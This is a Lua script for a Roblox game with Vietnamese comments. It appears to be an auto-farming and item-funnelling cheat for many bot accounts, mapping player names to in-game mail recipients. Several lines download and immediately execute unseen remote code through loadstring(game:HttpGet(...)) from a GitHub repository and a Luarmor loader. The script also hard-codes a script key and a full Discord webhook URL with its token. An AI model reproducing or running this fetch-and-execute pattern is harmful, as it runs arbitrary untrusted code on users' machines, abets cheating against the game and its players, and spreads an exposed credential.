if _G.TAG then
    warn("Script đã được chạy trước đó!")
    return -- Dừng script nếu đã chạy
end

-- Đánh dấu script đã được chạy
_G.TAG = true

if game.PlaceId == 140403681187145 then

else
	game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("World4Teleport"):InvokeServer()
	return
end

---------------------------------------------------------------------------------------------------------------------------
local Players = game:GetService("Players")
	local player = Players.LocalPlayer

	while not player do
		task.wait(1)
		player = Players.LocalPlayer
	end


	local names = {"Xx_BrooklynRid3rNigh","BearTurboPower","SkyAceArrow","EPIC_Starry2006","Blaz3Fusi0n2002","XxAidenNinjaPhoenixx","GlitchStormy92","XxOrbit_ViperxX2020","XxBearOmegaStarxX","N0va_Skater77","PulseDrag0nLucky2010","XxMiaCodeLionxX","ChloeHeroVenom","GalaxyCooki312","Eagl3_Danc3r2024","XxDawnSparklyHawkxX","GigaGlitch76","AvaPix3l2005","KayleeJellyDawn2006","XxSaber_Ech0xX2006","XxMate0V0rtexxX65","LuckyNinjaHyp3r","XxJamesMasterShadowx","PaisleyGiga69","Oliver_Dancer201265","Xx_ElijahLegendShado","8407Castellanos9571","VoidGalaxyChase","XxHawkRiftxX200537","RiderBlazePower","RiftBl0ck85_YT","Olivia_Pixelated25","XXGAMER_RavenxX44","EllaPhoenixRocket","HenryBaneClaw","Aubr3y_B3ar98YT","obENxTpG922","dzLCBpCO34","hasel7ut","groml7bi","kazel2ix","benke45o","westr2d6","deni8wu","SwansonRebeccap8","OlsenMiffyf7","MichaelBobbyj767","EatonShirleyr60","RosyJoev3","bows3us","8608Shafer9772","8751Hopper9915","885Darius886","agapetos52316","akkalupdovel","amanidiepertou","bertenferkin83","cancmaloyv","challhadlee87","clarigjambee","colliswurtsk","disbeld41","emettforestz","eyassamba55","glorie7096","gridedralici","knuimanadeliaww","kossevanzantv96","oliychinos6","pinataszanto51","racbracfe25","Reeder67056","syroariis","68Salvatore69","73Erika74","XxWillowSparkRid3rxX","Fury_ALPHA200764","CircuitCod394","etwitepluffyx","CHILL_Zap66","MasonSlim3Vort3x","NoahRift60","Hannah_Hunt3r2022","1952Fiore3116","NinjaStreamPixel","Her0SaberPrism96","BlastNinja22","XxG0ldenSparklyxX16","N0ahNe0n14","XxAmelia_CHAOSXX2016","1949McKnight3113","LIONBLAZEHERO2003_YT","XxMiaThunderxX26","Hero_Miner72","FireFr0stTiger2007","Fusi0nCrystal201969","HeroHawk40","pierautsundue86","AidenZeroRaven2004YT","yantungleggatt63","Dani3lPuls3Giga2011","AvaStarEagl3","XxT0xicKnightS0nicxX","EllaBane53","mayenkahan93","Charl0tteHawkByte","menkoludzer79","Pix3l_Blad384","CodeStarryDawn","lavinie91258","XxGalaxyEchoTigerxX","AidenCraft202228_YT","burchard6297","LuckyH3ro64","Layla_Dawn20","muoininfaui","XxEllie_GoldenxX2021","DarkClaw44_YT","karlo8266","ZeroFusion40","B3ast_Starry2005","wierdunseen39","Xx_ZaydenGlitchSpark","soojung48573"}

	local emails = {"hadriamullavey70","hexacefalesia","etexmet355","carteeppes5723","529Reid1693","534Zavier1698","8397Bolton9561","857Blair858","858Aniyah859","8590Peace9754","eldiantkeily","merentiana283","mineruthje251","mayobey924","whelmssteviac","hejnsadesa","gemmelbrnabyl","ulkeboraxb","panelraskin4722","galvoberczy69","8815Falk9979","kuvyndn117","baocho1135","baocho1131","1863Echols3027","513Moses1677","515Trenten1679","516Obed1680","517Bernardo1681","519Keshon1683","521Ahmad1685","8592Couture9756","8602Ha9766","8603Scherer9767","8605Olivarez9769","1872Salazar3036","micha_70m","dQ9PQsBg54","jrpB44FT38","FD7Fs4Hj763","YTAzK1dX05","akita1d6","7vmW8gRw14","hike9bc","xylatehaicor","tunostri486","Hanes59175","Toups51814","547UYOCV171","548Layton1712"}
	
	local totalEmails = #emails
	local groupSize = totalEmails
	local found = false

	for i = 1, #names do
		if player.Name == names[i] then
			local indexInGroup = ((i - 1) % groupSize) + 1
			getgenv().GMAIL_RECEIVERS = { tostring(emails[indexInGroup]) }
			found = true
			break
		end
	end

	if not found then
		getgenv().GMAIL_RECEIVERS = {"sijmongirthss","1940Mosier3104","soystaylan5","dreddyewele60","1971Nowak3135"}
		--warn("Tên người chơi không nằm trong danh sách hợp lệ.")
	end
---------------------------------------------------------------------------------------------------------------------------
loadstring(game:HttpGet("https://raw.githubusercontent.com/aztbuirczzxmmcx1zz/9xmin7bszzmiay87zpqla/refs/heads/main/list_item_send"))()

script_key = "IAMAiZhmvPSarFAwYGimVtcLzrqIAnAQ";

getgenv().GWEBHOOK_LINK = "https://discord.com/api/webhooks/1387622606286618665/f0mYrfoMSJRPaJWxf-qMtk-k7bOuNAJ4yqjRnReELSucp02pKxoUejUh7Q1K918pqWP3"


--loadstring(game:HttpGet("https://raw.githubusercontent.com/aztbuirczzxmmcx1zz/9xmin7bszzmiay87zpqla/refs/heads/main/_EVENT_scriptphu"))()
--loadstring(game:HttpGet("https://raw.githubusercontent.com/aztbuirczzxmmcx1zz/9xmin7bszzmiay87zpqla/refs/heads/main/_EVENT_GS_all_setting"))()

loadstring(game:HttpGet("https://raw.githubusercontent.com/aztbuirczzxmmcx1zz/9xmin7bszzmiay87zpqla/refs/heads/main/_farm_ngoai_scriptphu"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/aztbuirczzxmmcx1zz/9xmin7bszzmiay87zpqla/refs/heads/main/_farm_ngoai_GS_all_setting"))()


loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/ba2dcad2127dcfc04301dfe52ce6c61c.lua"))()
--loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/34915da4ad87a5028e1fd64efbe3543f.lua"))()
